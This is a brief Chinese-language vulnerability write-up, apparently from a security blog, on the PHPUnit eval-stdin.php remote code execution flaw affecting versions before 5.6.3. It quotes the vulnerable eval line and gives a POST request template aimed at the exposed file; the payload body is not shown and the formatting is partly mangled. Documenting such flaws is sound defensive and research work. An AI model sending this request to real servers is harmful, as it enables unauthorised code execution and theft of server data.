PHPUnit_eval-stdin.php_远程命令执行漏洞

# PHPUnit eval-stdin.php 远程命令执行漏洞

## 漏洞描述

PHPUnit5.6.3之前的版本,存在一处远程代码执行漏洞,利用漏洞可以获取服务器敏感信息及权限。

## 漏洞影响

PHPUnit < 5.6.3 ## 漏洞复现 漏洞位于 /phpunit/src/Util/PHP/eval-stdin.php 其中关键代码为: ``` eval('?>‘.file_get_contents(‘php://input’));
“`

发送如下请求包执行PHP代码

“`
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host:
Content-Length: 21
Accept-Encoding: gzip
“`

![php1.png](/static/qingy/PHPUnit_eval-stdin.php_远程命令执行漏洞/img/php-1.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容